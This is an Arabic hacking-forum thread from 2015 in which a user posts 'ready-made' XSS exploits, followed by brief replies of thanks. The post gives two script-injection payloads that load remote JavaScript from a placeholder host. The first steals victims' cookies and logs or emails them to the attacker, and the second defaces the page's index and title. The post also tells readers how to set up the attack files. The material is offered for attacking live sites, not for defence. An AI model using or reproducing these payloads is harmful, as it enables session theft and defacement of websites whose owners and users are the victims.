1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ درس ] أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

الموضوع في 'آمن المواقع والسيرفرات' بواسطة Egy HacKerS, بتاريخ ‏24 يونيو 2015.

كاتب الموضوع : Egy HacKerS المشاهدات : 540 الردود : 7 ‏24 يونيو 2015
  1. غير متصل

    Egy HacKerS
    DeveloPer Plus

    عضو منذ:
    ‏1 ديسمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    19
    نقاط الجائزة:
    الوظيفة:
    HacKer
    الإقامة:

    [​IMG]
    بسم الله الرحمن الرحيم

    احبتي الأعزاء السلام عليكم ورحمة الله وبركاته

    تقبل الله صيامكم وقيامكم صومآ مقبولآ وافطارآ شهيآ

    أسأل الله ان يتقبل منا ومنكم وان يجمعنا بكم في الفردوس الاعلى

    [​IMG]

    درسنا لهذا اليوم بتكلم عن بعض الإستغلالات الجاهزة لثغرات xss

    الإستغلال الأول : Log File For Get Cookies (لجلب الكوكيز)

    تحقن هذا الكود في الحقل المصاب : '

    [CODEE]"--><sc ript src=http://site.tld/cookies/xss.js></sc ript>[/CODEE]

    إمسح الفراغات

    يجب رفع ملفي xss.js & info_mail.php في مجلد cookies

    والنتائج ستظهر في ملف log.html

    [​IMG]

    أو يمكنك وضع إيميلك وستصلك رسالة بكوكيز الضحية


    ملاحظة الرجاء تعديل ملف info_mail.php لان الايميل الافتراضي هو root.sy@hotmail.com

    اذا لم تعدل عليه ستذهب جميع معلومات السحب على الايميل

    الإستغلال الثاني : change index

    تحقن هذا الكود في الحقل المصاب : '

    [CODEE]"--><sc ript src=http://site.tld/index/c_index.js></sc ript>[/CODEE]

    سيتم وضع الإندكس على كامل الصفحة + تغير title الصفحة + صورة في الإندكس

    يمكن تغير لينك الصورة من داخل الملف : c_index.js

    [​IMG]

    [​IMG]
     

    الملفات المرفقة:



    آخر تعديل بواسطة المشرف: ‏25 يونيو 2015
    جاري تحميل الصفحة...
  2. غير متصل

    Wolf Hex
    DeveloPer Plus

    عضو منذ:
    ‏24 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    Student
    الإقامة:

    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    وعليكم السلام ورحمه الله
    ثغرة جميله واستغلال اجمل
    يعطيك العافيه على مجهودك
    لاتحرمنا جديدك
    {1!$7}
     


  3. غير متصل

    J3eny
    rank
    Developer

    عضو منذ:
    ‏8 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مبدع من يومك يابطل :ُye@:
     


  4. غير متصل

    Resident Evil
    rank
    Developer

    عضو منذ:
    ‏27 ديسمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مشكووور اخوي.... وفقك الله
     


  5. غير متصل

    SMART-AL-Falahi
    Developer

    عضو منذ:
    ‏14 فبراير 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    وعليكم السلام ورحمه اللهمشكور اخي الغال ي طريقه قديم لكنه فعاله

     


  6. غير متصل

    سنوكـــر
    rank
    Developer

    عضو منذ:
    ‏18 يوليو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    الإقامة:

    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    :{7}: مشكووووووور أخي :{7}:​
     


  7. غير متصل

    before
    rank
    Developer

    عضو منذ:
    ‏12 مارس 2014
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    شكرا اخي على الامثلة
     


  8. غير متصل

    غاوي هكر
    DeveloPer Plus

    عضو منذ:
    ‏9 يوليو 2015
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: أمثله لبعض الاستغلالات الجاهزه في ثغرات xss

    مشكووور يا عسل بوركت
     


مشاركة هذه الصفحة

جاري تحميل الصفحة...